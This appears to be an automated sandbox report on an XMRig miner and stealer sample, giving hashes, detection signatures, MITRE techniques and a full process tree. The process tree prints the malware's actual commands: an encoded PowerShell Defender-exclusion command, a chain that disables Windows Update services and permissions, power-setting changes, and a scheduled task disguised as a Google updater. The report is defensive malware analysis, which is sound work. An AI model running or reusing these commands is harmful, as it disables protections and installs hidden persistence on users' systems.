xmrig | 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b

Analysis

max time kernel
148s
max time network
135s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
Size

171KB
MD5

b2983dc6d009875de6e6e97be5779db0
SHA1

11fd9f1b527eae215d51865dee19b3dceabd918c
SHA256

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b
SHA512

bbc86e6e5895c9ce90edde8c70178b70017891156929534d7ff7dabd0f435a0ee68863c95e888d3aaffef9efa3ac265c7e574715eb85e52c1c6ca970da546cea

Score

10^/10

xmrig discovery evasion exploit miner spyware stealer suricata

Malware Config

Signatures

suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3696-226-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/3696-228-0x000000014036DAD4-mapping.dmp	xmrig
behavioral1/memory/3696-229-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/3696-230-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/3696-233-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

720167.exeupdater.exe

pid process

4496 720167.exe
1276 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1980 takeown.exe
2808 icacls.exe
1072 takeown.exe
3764 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4496	720167.exe
1276	updater.exe

pid	process
1980	takeown.exe
2808	icacls.exe
1072	takeown.exe
3764	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

Loads dropped DLL 7 IoCs

Processes:

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

pid	process
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1980 takeown.exe
2808 icacls.exe
1072 takeown.exe
3764 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 freegeoip.app
24 freegeoip.app

pid	process
1980	takeown.exe
2808	icacls.exe
1072	takeown.exe
3764	icacls.exe

flow	ioc
23	freegeoip.app
24	freegeoip.app

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 3428 set thread context of 4908	3428	conhost.exe	conhost.exe
PID 3428 set thread context of 3696	3428	conhost.exe	explorer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1976 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

4304 powershell.exe
4304 powershell.exe
1316 conhost.exe
3928 powershell.exe
3928 powershell.exe
3428 conhost.exe

pid	process
1976	schtasks.exe

pid	process
4304	powershell.exe
4304	powershell.exe
1316	conhost.exe
3928	powershell.exe
3928	powershell.exe
3428	conhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	1316	conhost.exe
Token: SeShutdownPrivilege	2364	powercfg.exe
Token: SeCreatePagefilePrivilege	2364	powercfg.exe
Token: SeShutdownPrivilege	2664	powercfg.exe
Token: SeCreatePagefilePrivilege	2664	powercfg.exe
Token: SeShutdownPrivilege	3424	powercfg.exe
Token: SeCreatePagefilePrivilege	3424	powercfg.exe
Token: SeShutdownPrivilege	3812	powercfg.exe
Token: SeCreatePagefilePrivilege	3812	powercfg.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3428	conhost.exe
Token: SeShutdownPrivilege	3524	powercfg.exe
Token: SeCreatePagefilePrivilege	3524	powercfg.exe
Token: SeShutdownPrivilege	3100	powercfg.exe
Token: SeCreatePagefilePrivilege	3100	powercfg.exe
Token: SeShutdownPrivilege	4712	powercfg.exe
Token: SeCreatePagefilePrivilege	4712	powercfg.exe
Token: SeShutdownPrivilege	1348	powercfg.exe
Token: SeCreatePagefilePrivilege	1348	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe720167.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1112 wrote to memory of 4496	1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe	720167.exe
PID 1112 wrote to memory of 4496	1112	557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe	720167.exe
PID 4496 wrote to memory of 1316	4496	720167.exe	conhost.exe
PID 4496 wrote to memory of 1316	4496	720167.exe	conhost.exe
PID 4496 wrote to memory of 1316	4496	720167.exe	conhost.exe
PID 1316 wrote to memory of 4456	1316	conhost.exe	cmd.exe
PID 1316 wrote to memory of 4456	1316	conhost.exe	cmd.exe
PID 4456 wrote to memory of 4304	4456	cmd.exe	powershell.exe
PID 4456 wrote to memory of 4304	4456	cmd.exe	powershell.exe
PID 1316 wrote to memory of 4536	1316	conhost.exe	cmd.exe
PID 1316 wrote to memory of 4536	1316	conhost.exe	cmd.exe
PID 1316 wrote to memory of 4556	1316	conhost.exe	cmd.exe
PID 1316 wrote to memory of 4556	1316	conhost.exe	cmd.exe
PID 4536 wrote to memory of 4704	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4704	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2560	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2560	4536	cmd.exe	sc.exe
PID 4556 wrote to memory of 2364	4556	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 2364	4556	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 2484	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2484	4536	cmd.exe	sc.exe
PID 4556 wrote to memory of 2664	4556	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 2664	4556	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 4740	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4740	4536	cmd.exe	sc.exe
PID 4556 wrote to memory of 3424	4556	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 3424	4556	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 4012	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4012	4536	cmd.exe	sc.exe
PID 4556 wrote to memory of 3812	4556	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 3812	4556	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 2292	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2292	4536	cmd.exe	sc.exe
PID 1316 wrote to memory of 4888	1316	conhost.exe	cmd.exe
PID 1316 wrote to memory of 4888	1316	conhost.exe	cmd.exe
PID 4536 wrote to memory of 1548	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1548	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 3764	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 3764	4536	cmd.exe	sc.exe
PID 4888 wrote to memory of 1976	4888	cmd.exe	schtasks.exe
PID 4888 wrote to memory of 1976	4888	cmd.exe	schtasks.exe
PID 4536 wrote to memory of 4652	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4652	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1392	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1392	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4020	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 4020	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2152	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 2152	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1268	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1268	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 3328	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 3328	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 452	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 452	4536	cmd.exe	sc.exe
PID 4536 wrote to memory of 1980	4536	cmd.exe	takeown.exe
PID 4536 wrote to memory of 1980	4536	cmd.exe	takeown.exe
PID 4536 wrote to memory of 2808	4536	cmd.exe	icacls.exe
PID 4536 wrote to memory of 2808	4536	cmd.exe	icacls.exe
PID 4536 wrote to memory of 2332	4536	cmd.exe	reg.exe
PID 4536 wrote to memory of 2332	4536	cmd.exe	reg.exe
PID 4536 wrote to memory of 4688	4536	cmd.exe	reg.exe
PID 4536 wrote to memory of 4688	4536	cmd.exe	reg.exe
PID 4536 wrote to memory of 1420	4536	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
"C:\Users\Admin\AppData\Local\Temp\557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\AppData\Local\720167.exe
"C:\Users\Admin\AppData\Local\720167.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4496

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\720167.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:4704

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:2560

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:2484

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:4740

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:4012

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:2292

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:1548

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:3764

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:4652

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:1392

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:4020

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:2152

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:1268

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:3328

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:452

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1980

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2808

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:2332

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:4688

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:1420

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:4276

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:4080

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:2440

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:4000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:3968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:2472

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:4212

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:4964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:2036

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
PID:4552

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:1276

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
7⤵
PID:2616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:348

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:2788

C:\Windows\system32\sc.exe
sc stop bits
8⤵
PID:3472

C:\Windows\system32\sc.exe
sc stop dosvc
8⤵
PID:1164

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:2924

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:2560

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:3596

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:3892

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:4960

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:1632

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:4108

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:4468

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:1760

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1072

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3764

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:2968

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:4476

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:4280

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
8⤵
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
PID:4576

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3100

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
7⤵
PID:4908

